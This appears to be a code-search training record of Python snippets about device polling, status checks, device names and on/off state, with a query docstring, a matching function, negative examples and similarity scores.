padded with 5 seconds just to be on the safe side\n secs = self.reset - now + 5\n logging.info(\"sleeping %s seconds for 
rate limiting\" % secs)\n time.sleep(secs)\n else:\n # sleep a second before checking again for new rate limit\n time.sleep(1)\n # get the latest limit\n self.ping()\n self.remaining -= 1", "def poll_health():\n global timesCalled\n\n # Poll /health\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=0.5)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n response = session.get(health_url)\n\n # Check HTTP status code\n status_code = response.status_code\n if status_code != status_ok:\n exit(1)\n\n # Get metrics values\n metrics = response.json()['metrics']\n requestLatencyValues.append(metrics['requestLatency'])\n dbLatencyValues.append(metrics['dbLatency'])\n cacheLatencyValues.append(metrics['cacheLatency'])\n\n # If 60 seconds has passed, send data to STDOUT\n timesCalled += 1\n if timesCalled == 6:\n output_data()\n\n timesCalled = 0\n requestLatencyValues.clear()\n dbLatencyValues.clear()\n cacheLatencyValues.clear()", "def _server_poll_expcompleted_(self):\n #print \"class Princeton_CCD function _server_poll_expcompleted_\" \n try:\n last_state = self.polled_running\n except (AttributeError,UnboundLocalError):\n self.polled_running = False\n last_state = False\n self.polled_running = self.query_running()\n if (not bool(last_state) and bool(self.polled_running)):\n self.begin_acq_time = time.time()\n #print self.query_running(), last_state\n #if ((last_state == True) and (self.polled_running == False)): CP\n if (bool(last_state) and not bool(self.polled_running)):\n self.end_acq_time = time.time()\n return True\n else:\n return False", "def refresh_status(self):\n status = self.cmodel.get_status()\n if status is not None:\n self.reg_status_pub.publish(status)\n\n with self.reg_status_cv:\n self.reg_status = status\n self.reg_status_cv.notify_all()\n\n if status.gFLT != 0 and not self.resetting:\n self.__log.info('RESETTING Robotiq {}'.format(self.name))\n self.reset_gripper()\n return status", "async def monitor():\n\n for n in range(6):\n await asyncio.sleep(2)\n print(\"monitor status:\", n, await ps.status())", "def toggle_polling(self):\n self.polling = not self.polling\n if not self.polling:\n # print('In toggle polling')\n self._stop_loop_feedback()\n self._start_loop_poll() if self.polling else self._stop_loop_poll()", "def __updateStreamStatus(self):\n while(True):\n for server,streams in self._streamsByServer.items():\n activeStreams = server.getActiveStreams()\n # Update each streams state\n for stream in streams:\n stream.lock.acquire()\n stream.setStreamState(server,Stream.STATE.DOWN)\n if (stream.name in activeStreams):\n stream.setStreamState(server,Stream.STATE.UP)\n stream.setStreamAddress(server,activeStreams[stream.name])\n stream.lock.release()\n time.sleep(StreamManager.SECS_BETWEEN_STATUS_CHECKS)", "def poll(until):\n\n start = time.time()\n\n while not until():\n time.sleep(0.5)\n cur = time.time()\n elapsed = int(round(cur - start))\n if int(elapsed) % 60 == 0:\n print('Waiting ({:0.2f} minutes)'.format(elapsed / 60.0))", "async def _async_status_request(self) -> None:\n try:\n # status_response = await self._hass.async_add_executor_job(\n # self._mc_status.status, self._MAX_RETRIES_STATUS\n # )\n if self.access_token:\n if (time.time() - self.last_request) > 1800:\n phantom = await self._hass.async_add_executor_job(\n self._phantom_load\n )\n if phantom.status_code == HTTP_OK:\n self.phantom_load = round(phantom.json().get(\"power\") / 1000, 3)\n else:\n _LOGGER.warning(phantom.content)\n\n # Got answer to 
request, update properties.\n live = await self._hass.async_add_executor_job(self._live_data)\n\n if live.status_code == HTTP_OK:\n self.power_usage = round(abs(live.json().get(\"power\")) / 1000, 3)\n else:\n _LOGGER.warning(live.content)\n\n self.last_request = time.time()\n self._last_status_request_failed = False\n except OSError as error:\n # No answer to request, set all properties to unknown.\n self.power_usage = None\n self.phantom_load = None\n\n # Inform user once about failed update if necessary.\n if not self._last_status_request_failed:\n _LOGGER.warning(\n \"Updating the properties of '%s' failed - OSError: %s\",\n self.unique_id,\n error,\n )\n self._last_status_request_failed = True", "def process_status_poll(self, status):\n self.log.debug('process-status-poll', status=status)\n\n if self._admin_state != AdminState.ENABLED:\n return\n\n # Get new/missing from the discovered ONU leaf. Stale ONUs from previous\n # configs are now cleaned up during h/w re-sync/reflow.\n\n new, rediscovered_onus = self._process_status_onu_discovered_list(status.discovered_onu)\n\n # Process newly discovered ONU list and rediscovered ONUs\n\n for serial_number in new | rediscovered_onus:\n reactor.callLater(0, self.add_onu, serial_number, status)\n\n # Process LOS list\n self._process_los_alarms(frozenset(status.ont_los))\n\n # Process ONU info. Note that newly added ONUs will not be processed\n # until the next pass\n\n self._update_onu_status(status.onus)", "def _update_status(self, new_status):\r\n old_status = self._status\r\n self._status = new_status\r\n for listener in self._listeners:\r\n # Calling user-defined callback.\r\n self._thread_pool.submit(\r\n listener.on_status_change(\r\n self, new_status.value, old_status.value))", "def poll(self):\n Monitor.poll(self)\n return deferToThread(self._poll)", "def waitStatus(j, wtype='Load'):\n timeout = 1\n curIter = 0\n maxIter = 60\n done = False\n while not done:\n stat = j.GetStatus(wtype)\n if stat == \"complete\":\n done = True\n else:\n curIter = curIter + 1\n if curIter > maxIter:\n raise ValueError(\"timeout waiting\")\n time.sleep(timeout)", "def _check_status(self):\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n return info", "def do_monitor(self):\n while not self.expired:\n self.expired = True\n time.sleep(self.interval)\n self.dead_fn()", "def online_check(self):\n self.online = False\n online_topic = '{t_topic}/INFO2'.format(**self)\n print('{BLUE}Watching for {}{NOCOLOR}'.format(online_topic, **colors))\n self.mqtt.connect(self.mqtt_host)\n self.mqtt.message_callback_add(online_topic, lambda *args: setattr(self, 'online', True))\n self.mqtt.subscribe(online_topic)\n starttime = datetime.datetime.now()\n while self.online == False and (datetime.datetime.now() - starttime).total_seconds() < wait_time:\n self.mqtt.loop(timeout=loop_time)\n time_waited = (datetime.datetime.now() - starttime).total_seconds()\n if self.online == False:\n print('{RED}{f_name} did not come online within {wait_time} '\n 'seconds{NOCOLOR}'.format(f_name=self.f_name, wait_time=str(wait_time), **colors))\n elif self.online == True:\n print('{GREEN}{f_name} came online in {time_waited} '\n 'seconds{NOCOLOR}'.format(f_name=self.f_name, time_waited=time_waited, **colors))\n self.mqtt.unsubscribe(online_topic)\n self.mqtt.message_callback_remove(online_topic)\n self.mqtt.disconnect()", "def update_status(self):\n if self.pwm:\n if self.state == GPIO.HIGH:\n thread = 
threading.Thread(target=self._pwm_on, args=())\n thread.start()\n elif self.state == GPIO.LOW:\n thread = threading.Thread(target=self._pwm_off, args=())\n thread.start()\n else:\n GPIO.output(self.id_, self.state)\n\n return self.get_status()", "def poll_device(self):\n #self.logger.info(\"poll_device: Checking online status\")\n for tasmota_topic in self.tasmota_devices:\n if self.tasmota_devices[tasmota_topic].get('online', None) is not None:\n if self.tasmota_devices[tasmota_topic]['online_timeout'] < datetime.now():\n self.tasmota_devices[tasmota_topic]['online'] = False\n self.set_item_value(tasmota_topic, 'item_online', False, 'poll_device')\n self.logger.info(f\"poll_device: {tasmota_topic} is not online any more - online_timeout={self.tasmota_devices[tasmota_topic]['online_timeout']}, now={datetime.now()}\")", "def get_status_change(self):\n if self.sync:\n raise EvseError\n else:\n self.s.timeout = STATUS_SERIAL_TIMEOUT\n try:\n # Wait to have read all status changes, only return the last one\n while True:\n self._get_response()\n except EvseTimeoutError:\n pass\n self.s.timeout = STANDARD_SERIAL_TIMEOUT\n # In fact, the callback is called by get_response...\n # Here we only deal with the value of self.\n status = self.new_status\n self.new_status = None\n return status", "def wait_until_idle(self):\n while True:\n time.sleep(self.__interface.WT_STATE_LOOKUP)\n\n if not self.is_busy:\n break", "def test_poll(self):\n ret = poll.poll(self.args)\n self.assertEqual(ret, poll.NOERROR)", "def update_ticker(self):\n while True:\n Thread(target=self.update_data_check).start()\n time.sleep(60)", "async def _poll(self):\n while True:\n await asyncio.sleep(self._poll_period)\n weight = self.weight\n message = Message(payload=cbor2.dumps(weight), code=CONTENT, content_format=60)\n self.updated_state(message)" ]
[ "0.7244833", "0.6906433", "0.6889742", "0.6884497", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68633866", "0.68553823", "0.6825127", "0.68249416", "0.68163466", "0.67354786", "0.67165923", "0.6712912", "0.6703656", "0.6651261", "0.66333985", "0.6596781", "0.6525885", "0.6522338", "0.6515367", "0.6515367", "0.6515367", "0.64960384", "0.648296", "0.6465489", "0.6413869", "0.64119977", "0.640905", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63898975", "0.63620263", "0.6342184", "0.6336024", "0.6335791", "0.6318878", "0.631398", "0.63084966", "0.63032377", "0.6292084", "0.62778795", "0.62539387", "0.62455857", "0.6241496", "0.62223995", "0.6216566", "0.620509", "0.619756", "0.6192683", "0.6181867", "0.6153506", "0.6136822", "0.61271966", "0.6121346", "0.61100066", "0.61060673", "0.6097237", "0.60897446", "0.6089131", "0.6076079", "0.60743034", "0.60604584", "0.60502476" ]
0.66181207
49
Return the name of the device if any.
def name(self): return self._name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def device_name(self) -> Optional[str]:\n return pulumi.get(self, \"device_name\")", "def device_name(self) -> Optional[str]:\n return pulumi.get(self, \"device_name\")", "def name(self):\n return self._device.name", "def name(self):\n return self._device.name", "def name(self):\n return self._device.name", "def get_device_name(self):\n name = self._device[\"name\"]\n if not name or name == \"--\":\n name = self._mac\n\n return name", "def name(self):\n return self.device.name()", "def name(self):\n return self.device.device_data[self.device_id]['name']", "def device_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"device_name\")", "def device_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"device_name\")", "def get_device_name(self, device: str) -> str | None:\n raise NotImplementedError()", "def name(self) -> str:\n return self._device.name or self._device.mac", "def name(self):\n return f\"{get_device_name(self._data, 0, self._name)}\"", "def getDeviceName(self):\n name = str(nvmlDeviceGetName(self.handle))\n return name", "def name(self):\n return self._device.device_data[self._uuid]['name']", "def _get_device_name(self, device_id: str) -> str | None:\n if device := self.get_device(device_id):\n return device.device_name\n return None", "def name(self):\n return self._device.description_pretty()", "def name(self):\n if self._connection.location_names:\n return '{} {} {}'.format(self._device.location2, self._device.location, self._device.name)\n else:\n return self._device.name", "def name(self) -> str:\n return self.camera_info[\"device_name\"]", "def get_device(self) -> str:\n pass", "async def async_get_device_name(self, device):\n if device not in self.last_results:\n return None\n return self.last_results[device].name", "def get_device_name(self, identity, device):\n device_info = self._get_device(identity, device)\n return device_info.get('Name', identity)", "def get_device_name(self, device):\n if not self.last_results:\n return None\n for client in self.last_results:\n if client[\"mac\"] == device:\n return client[\"hostname\"]\n return None", "def get_device_name(self, device):\n if not self.last_results:\n return None\n for client in self.last_results:\n if client.mac == device:\n return client.name\n return None", "def _get_device_name(self, device_id):\n if self._locks_by_id.get(device_id):\n return self._locks_by_id[device_id].device_name\n if self._doorbells_by_id.get(device_id):\n return self._doorbells_by_id[device_id].device_name", "def name(self):\n return self._get_device_class_name()", "def get_device_name(self, device):\n with self.lock:\n # If not initialised and not already scanned and not found.\n if device not in self.hostname_cache:\n self.get_ddwrt_data()\n\n return self.hostname_cache.get(device, False)", "def name(self) -> str:\n return self.profile_device.name", "def retrieve_device_name(self, device_id):\n if device_id is None:\n self.log_error(MongoDatabase.retrieve_device_name.__name__ + \"Unexpected empty object: device_id\")\n return None\n\n try:\n device = self.devices_collection.find_one({\"device_id\": device_id})\n if device is not None:\n return device['name']\n except:\n traceback.print_exc(file=sys.stdout)\n self.log_error(sys.exc_info()[0])\n return None", "def name(self):\n return self.devname", "def find_iio_device_name(self):\n self.iio_device_dir()\n self.console.runcmd(f\"cat name\", expected=\"\\r\\n\")\n iio_device_name = self.console.output()\n return iio_device_name", "def get_dev_name(self):\n\t\treturn 
call_sdk_function('PrlSrvCfgHdd_GetDevName', self.handle)", "def getParentDeviceName(self):\n name = \"\"\n dev = self.device()\n if dev: name = dev.getDeviceName()\n return name", "def device(self) -> str:\n return self._device", "def name(self):\n _LOGGER.debug(self._shelly_cloud_device_name + ' >>> ' +\n self._shelly_cloud_entity_name + ' >>> name() >>> ' +\n self._shelly_cloud_device_name)\n return self._shelly_cloud_device_name", "def name(self):\n return f\"{self.device_name} {self.device_variable}\"", "def name(self) -> str:\n return self.config_name or self.host_name or self.dev_id or DEVICE_DEFAULT_NAME", "def _get_device_name(auth_header, user, device_id, async_kvstore_client, request_context):\n\n response = yield async_kvstore_client.async_kvstore_get_request(\n constants.REGISTERED_DEVICES_COLLECTION_NAME, auth_header=auth_header, owner=user)\n\n if response.code == http.OK:\n response_json = yield response.json()\n\n for device in response_json:\n if device[\"device_id\"] == device_id:\n defer.returnValue(device[\"device_name\"])\n\n LOGGER.error(\"Unable to fetch friendly name for device={}, code={}\".format(device_id, response.code))\n defer.returnValue(\"\")", "def device_get_name(pnd):\n return _nfc.device_get_name(pnd)", "def device_object_name(self):\n try:\n return self.get_property(gdef.SPDRP_PHYSICAL_DEVICE_OBJECT_NAME)\n except WindowsError as e:\n if e.winerror not in (gdef.ERROR_INVALID_DATA, gdef.ERROR_NO_SUCH_DEVINST):\n raise", "def name(self):\n return self._meural_device[\"alias\"]", "def name(self):\n # self._name = \"wyzeapi_\"+self._device_mac+\"_\"+ self._name\n return self._device.nickname", "def core_device_thing_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"core_device_thing_name\")", "def name(self):\n return self.device.device_data[self.device_id]['name'] + \\\n f' {self._sensor_type}'", "def kdev_name(self):\n return self._sysfs", "def name(self):\n return '{} {}'.format(self._device,\n self._endpoint)", "def get_name(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "async def get_hostname(self):\n\n # Display info message\n log.info(\"get_hostname\")\n\n # Get hostname\n output = await self.send_command(self.cmd_get_hostname)\n\n # Display info message\n log.info(f\"get_hostname: output: '{output}'\")\n\n # Remove the useless information in the returned string\n output = output.split(\"System Name: \")[1].strip()\n\n # Display info message\n log.info(f\"get_hostname: hostname found: '{output}'\")\n\n # Return the name of the device\n return output", "def dm_name(self):\n if self._dm_name is not None:\n return self._dm_name\n if not self.exists:\n return None\n if not os.path.exists(self.sysfs_dm_name_file):\n return None\n self.retr_dm_name()\n return self._dm_name", "def device(self):\n return self._vars[0].device", "def testCheckDeviceName(self):\n device = config.devices[self.driver.desired_capabilities.get(\"deviceName\")][\"name\"]\n print(\"Device : \", device)", "async def get_hostname(self):\n\n # Display info message\n log.info(\"get_hostname\")\n\n # Get hostname\n output = await self.send_command(self.cmd_get_hostname)\n\n # Display info message\n log.info(f\"get_hostname: output: '{output}'\")\n\n # Remove the useless information in the returned string\n output = output.split()[0]\n\n # Display info message\n log.info(f\"get_hostname: hostname found: '{output}'\")\n\n # Return the name of the device\n return output", "def get_char_name(self):\n return self._character_device_path.split('/')[-1]", 
"def name(self) -> str:\n return self.dev.label", "def __get_device_type_name(self, mps_db_session, device_type_id):\n device_type = mps_db_session.query(models.DeviceType).filter(models.DeviceType.id==device_type_id).all()\n\n if len(device_type) == 1:\n return device_type[0].name\n elif len(device_type) == 0:\n raise ValueError(\"Function \\\"__get_device_type_name(device_type_id={}). Not fault was found.\\\"\"\n .format(device_type_id))\n else:\n raise ValueError(\"Function \\\"__get_device_type_name(device_type_id={}). More than one device matches.\\\"\"\n .format(device_type_id))", "def GetDeviceTypeName(self):\n if self._device_type_name is None:\n self._device_type_name = self.LsbReleaseValue(\n key='DEVICETYPE', default='CHROMEBOOK')\n return self._device_type_name", "def name(self):\n if self._slave_mode:\n for dev in self._multiroom_group:\n for device in self.hass.data[DOMAIN].entities:\n if device._is_master:\n return self._name + ' [' + device._name + ']'\n else:\n return self._name\n return self._name", "def __str__(self):\n return \"Device %d\" % self.device_id", "def dev_name_prefix(self):\n match = self._name_re.match(self.dev_name)\n if not match:\n raise InvalidDeviceNameError(\"Not a valid device name: '%s'\" %\n self.dev_name)\n\n return match.group(1)", "def device_info(devid: int = 0) -> str: # pragma: no cover\n numdev = jax.device_count()\n if devid >= numdev:\n raise RuntimeError(f\"Requested information for device {devid} but only {numdev} present.\")\n dev = jax.devices()[devid]\n if dev.platform == \"cpu\":\n info = \"CPU\"\n else:\n info = f\"{dev.platform.upper()} ({dev.device_kind})\"\n return info", "def device():\n return G.DEVICE", "def name(self):\n return f\"{self.sensor_type['name']} ({self._mac[-5:]})\"", "async def async_get_device_name(self, device: str) -> str | None:\n assert (\n self.hass is not None\n ), \"hass should be set by async_setup_scanner_platform\"\n return await self.hass.async_add_executor_job(self.get_device_name, device)", "def name(self):\n return self._sensor.name", "def device_num(self) -> str:\n return pulumi.get(self, \"device_num\")", "def device() -> str:\n import torch\n\n if torch.cuda.is_available() and torch.cuda.device_count() > 0:\n if hasattr(Config().trainer,\n 'parallelized') and Config().trainer.parallelized:\n device = 'cuda'\n else:\n device = 'cuda:' + str(\n random.randint(0,\n torch.cuda.device_count() - 1))\n else:\n device = 'cpu'\n\n return device", "def get_sensor_name(self):\n return self.data[1]", "def no_device(self) -> Optional[str]:\n return pulumi.get(self, \"no_device\")", "def no_device(self) -> Optional[str]:\n return pulumi.get(self, \"no_device\")", "def device_id(self) -> Optional[str]:\n return self.relay(\"device_id\")", "def sysfs_dm_name_file(self):\n if not self.sysfs_dm_dir:\n return None\n return os.path.join(self.sysfs_dm_dir, 'name')", "def group_name(self):\n return \"device-%s\" % self.id", "def device(self):\n hw = self.hw()\n if hw: return hw.device()", "def name(self) -> str:\n return f\"{self.platform_name} {self._sensor_name}\"", "def get_device(arn=None):\n pass", "def getParentDeviceTitle(self):\n title = \"\"\n dev = self.device()\n if dev: title = dev.titleOrId()\n return title", "def get_hostname(self):\n return self.mycam.devicemgmt.GetHostname()", "def name(self):\n return 'Connected Devices'", "def get_device_id(self) -> str:\n return Config.get('device_id')", "def get_name(self):\n\t\treturn call_sdk_function('PrlSrvCfgDev_GetName', self.handle)", "def 
generate_device_name(device, description): \n datacenter = 'SYD' \n devices = {'firewall': 'Cisco_MX', 'wireless': 'Cisco_MR'} \n\n type = devices[device] \n name = f\"{type}--{description}__{datacenter}\" \n \n return name", "def dev_name(self):\n if not self.is_rule:\n raise NotRuleError(\"No 'NAME' field.\")\n\n return self._fields[\"NAME\"]", "def retr_dm_name(self):\n\n if not self.name:\n msg = _(\n \"Cannot retrieve dm_name file, \"\n \"because it's an unnamed devicemapper device object.\")\n raise DmDeviceError(msg)\n\n if not self.exists:\n msg = _(\n \"Cannot retrieve dm_name file of %r, \"\n \"because the devicemapper device doesn't exists.\") % (\n self.name)\n raise DmDeviceError(msg)\n\n r_file = self.sysfs_dm_name_file\n if not os.path.exists(r_file):\n msg = _(\n \"Cannot retrieve dm_name file of %(bd)r, \"\n \"because the file %(file)r doesn't exists.\") % {\n 'bd': self.name, 'file': r_file}\n raise DmDeviceError(msg)\n\n if not os.access(r_file, os.R_OK):\n msg = _(\n \"Cannot retrieve dm_name file of %(bd)r, \"\n \"because no read access to %(file)r.\") % {\n 'bd': self.name, 'file': r_file}\n raise DmDeviceError(msg)\n\n f_content = self.read_file(r_file, quiet=True).strip()\n if not f_content:\n msg = _(\n \"Cannot retrieve dm_name file of %(bd)r, \"\n \"because file %(file)r has no content.\") % {\n 'bd': self.name, 'file': r_file}\n raise DmDeviceError(msg)\n\n self._dm_name = f_content", "def device_id(self) -> str:\n return self._device_info[\"ID\"]", "def vendor_name(self):\n return self._device.vendor", "def get_device(self):\n return self.parent.get_device()", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def device(self):\n return next(self.parameters()).device", "def test_device_states_device_name_get(self):\n pass", "def get_name(self):\n return self.nvPublic.get_name()", "def device_provisioning_host_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"device_provisioning_host_name\")", "def device(self):\n return self._device", "def device_provisioning_host_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"device_provisioning_host_name\")", "def generate_device_name(device, description):\n datacenter = 'RTP'\n devices = {'firewall': 'Cisco_ASAv', 'router': 'Cisco_Cat-8k'}\n\n device_type = devices[device]\n name = f\"{device_type}--{description}__{datacenter}\"\n\n return name", "def get_device(self):\n raise NotImplementedError()", "def get_name(cls):\n return DRIVER_NAME" ]
[ "0.89734465", "0.89734465", "0.8584627", "0.8584627", "0.8584627", "0.8502048", "0.84944665", "0.84194607", "0.83955586", "0.83955586", "0.8379756", "0.83165", "0.8306566", "0.8161454", "0.81564134", "0.8090303", "0.8087526", "0.8073198", "0.8006941", "0.7999654", "0.79544145", "0.7942609", "0.79231834", "0.79003376", "0.7892853", "0.78887457", "0.7885869", "0.77037406", "0.7679084", "0.76708424", "0.76574874", "0.7591413", "0.75360775", "0.752754", "0.7503572", "0.740907", "0.7405346", "0.73706686", "0.7363064", "0.7360331", "0.73424125", "0.7284668", "0.718853", "0.7185505", "0.71458435", "0.7078036", "0.70713276", "0.70563745", "0.7038886", "0.70158154", "0.70148325", "0.698652", "0.69633955", "0.6946806", "0.688068", "0.6880524", "0.6879555", "0.6842212", "0.683373", "0.68165874", "0.6794383", "0.6794009", "0.6740635", "0.6730933", "0.6712652", "0.66963136", "0.668313", "0.6671994", "0.6671994", "0.6669045", "0.6656662", "0.6655738", "0.6651435", "0.6644615", "0.6642231", "0.66355723", "0.6623369", "0.66176414", "0.66060066", "0.6596274", "0.6578622", "0.6560098", "0.6559068", "0.65411913", "0.65277195", "0.6515479", "0.6484918", "0.6484918", "0.64680797", "0.64680797", "0.64680797", "0.64680797", "0.64680797", "0.64609236", "0.64493054", "0.64416623", "0.64343995", "0.640955", "0.6405033", "0.6400574", "0.6396757" ]
0.0
-1
Return true if device is on.
def is_on(self): camera = self.coordinator.data[self._camera_id] if self._switch_type == "record_motion": enabled = True if camera["recording_mode"] == TYPE_RECORD_MOTION else False elif self._switch_type == "record_always": enabled = True if camera["recording_mode"] == TYPE_RECORD_ALLWAYS else False else: enabled = True if camera["ir_mode"] == self._ir_on_cmd else False return enabled
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_on(self) -> bool:\n return self._device.is_on", "def is_on(self):\n return self._device.is_on", "def is_on(self):\n return self._device.is_on", "def is_on(self):\n return self._device.is_on", "def is_on(self):\n return self._device.state", "def is_on(self) -> bool:\n raise NotImplementedError(\"Device subclass needs to implement this.\")", "def _is_device_active(self):\n return self.power_mode == STATE_ON", "def is_on(self) -> bool:\n return self.tuya_device.status.get(DPCODE_SWITCH, False)", "def is_on(self) -> bool:\n return self._device.fan_on", "def is_on(self) -> bool:\n return self.entity_description.get_ufp_value(self.device) is True", "def is_on(self) -> bool:\n return self.entity_description.get_ufp_value(self.device) is True", "def is_on(self):\n return bool(self._insteon_device_group.value)", "def is_on(self):\n return self._device.state == SHCShutterContact.ShutterContactService.State.OPEN", "def is_on(self):\n return True if self._device.device_data[self._uuid]['streaming_state'] == \\\n 'streaming-enabled' or \\\n self._device.device_data[self._uuid]['streaming_state'] == \\\n 'online-disabled' else False", "def is_on(self) -> bool:\n return self.coordinator.data.get_metric(METRIC_KEY_MODE) == MODE_ON", "def device_is_configured(self):\n\n\t\ttry:\n\t\t\t_ = self._dev\n\t\texcept:\n\t\t\treturn False\n\n\t\treturn True", "def is_on(self):\n return self._controller.is_on", "def is_on(self) -> bool:\n return self._state == STATE_ON", "def is_on(self) -> bool:\n return self._is_on", "async def connected(self) -> bool:\n args = ['-t', f\"DEVICE INFO,{self.conf['device_address']}\"]\n output = await self.run_vh(args)\n return \"IN USE BY: NO ONE\" not in output", "def is_on(self):\n return self._sensor_state()", "def is_on(self):\n return getattr(self._node, STICK_API[USB_MOTION_ID][ATTR_STATE])", "def is_on(self):\n return self._program.get(\"enabled\") is True", "def is_on(self):\n return self._device.car_state.get(self._key)", "def is_on(self):\n if self._power_state == HYSEN_POWERON :\n return True\n else:\n return False", "def is_on(self):\n return getattr(self.coordinator.data[0], self._sensor) is True", "def check_connectivity(self):\n r = self.run_cmd(\"get-state\")\n return r.startswith(\"device\")", "def available(self) -> bool:\n return self._device.is_connected", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self):\n return self._state == STATE_ON", "def is_on(self) -> bool:\n return self._state", "def is_on(self):\n return self._on", "def is_on(self) -> bool:\n return bool(self._state)", "def is_on(self) -> bool:\n return self._client.get_circ_pump()", "def is_connected(self):\n return self.hw_connected", "def is_on(self):\n return self._poe_data.ports[self._port]['state'] == STATE_ON", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_on(self):\n return self._is_on", "def is_host_on(self):\n status = False\n cmd = \"/usr/local/bin/wedge_power.sh status\"\n data = run_shell_cmd(cmd)\n Logger.info(\"[FSCD Testing] Executing 
cmd= [{}]\".format(cmd))\n Logger.info(\"[FSCD Testing] Received data= [{}]\".format(data))\n if \"on\" in data:\n status = True\n Logger.info(\"[FSCD Testing] userver power status {}\".format(status))\n return status", "def available(self) -> bool:\n return self._device.is_online", "def is_on(self):\n pass", "def is_on(self) -> bool | None:\n return self._state", "def check_device_state(self):", "def is_on(self):\n data = self.sensor_data\n if data and data[\"model\"] == \"SML\" and data[\"changed\"]:\n return data[\"state\"] == STATE_ON\n return False", "def is_on(self) -> bool:\n if self._state == STATE_UNKNOWN:\n return False\n return bool(self._state)", "def is_on(self):\n if self._sensor_type != DEVICE_TYPE_DOORBELL:\n return self._camera_data[\"event_on\"]\n return self._camera_data[\"event_ring_on\"]", "def is_on(self):\n return bool(self._state)", "def is_on(self):\n return bool(self._state)", "def is_on(self):\n return self._get_state() == ServerState.ON", "def is_on(self):\n return False", "def is_on(self):\n return bool(self.arest.data.get('state'))", "def is_on(self):\n return self.wink.state()", "def is_on(self):\n return self.device.override_time != 0", "def is_on(self) -> bool:\n return self._smart_system.is_ws_connected", "def available(self):\n return True if self._device.status == \"AVAILABLE\" else False", "def is_on(self) -> bool:\n return self._state == \"yes\"", "def is_on(self):\n ret_val = self._get_switch_state()\n if ret_val is None:\n return False\n if isinstance(ret_val, bool):\n return ret_val\n if ret_val == STATE_ON:\n return True\n state = STATE_LOOKUP.get(ret_val, STATE_OFF)\n return state == STATE_ON", "def is_connected(self) -> bool:\n return self.arduino is not None", "def is_on(self):\n return self._client.get_power()", "def is_on(self):\n return self._light_on", "def is_on(self):\n return self.car.data[DATA_PLUGGED_IN]", "def is_on(self):\n return bool(self.enabled)", "def is_on(self):\n return not self.ready", "def on(self) -> bool:\n on_cmd = HomeAssistantPlugin.service_map[self.domain.lower()][\"on\"]\n return self.send(on_cmd)", "def is_device_connected(device_id):\n try:\n device_name = subprocess.check_output([ADB_EXECUTOR, '-s', device_id, 'shell', 'getprop', 'ro.product.model'])\n device_name = device_name.decode(DEFAULT_CHARSET).replace('\\n', '').replace('\\r', '')\n logger.info('device {} online'.format(device_name))\n except subprocess.CalledProcessError:\n return False\n return True", "def on(self):\n status = self.dev.ctrl_transfer(0x40, 0x01, 0x0001, 0xa0, [])\n if status == 0:\n self.ev.set()\n return (status == 0)", "def is_on(self):\n return self._data[\"enabled\"]", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_on(self):\n return self._state", "def is_connected(self):\n\t\treturn bool(call_sdk_function('PrlVmDev_IsConnected', self.handle))", "def is_on(self):\n return self._mower_status in [\n STATUS_EXECUTING_START, STATUS_OK_CHARGING,\n STATUS_OK_CUTTING, STATUS_OK_LEAVING, STATUS_OK_SEARCHING, STATUS_OK_CUTTING_MANUAL]", "def is_on(self):\n return (\n self._device.batterylevel != 
SHCBatteryDevice.BatteryLevelService.State.OK\n )", "def is_online(self, device):\n # TODO: Add info for the device if it is actually ONLINE\n return device in self.backends", "def is_on(self) -> bool:\n return self._current_speed != SPEED_OFF", "def is_on(self):\n\n return self._state", "def is_on(self):\n request = requests.get(self._resource+\"/state\", timeout=10)\n \n try:\n if int(float(request.text)) > 0:\n self._state = True\n else:\n self._state = False\n \n except:\n self._state = None\n \n return self._state", "def is_on(self):\n return self._brightness != 0", "def is_on(self):\n return self.car.data[DATA_CHARGING]" ]
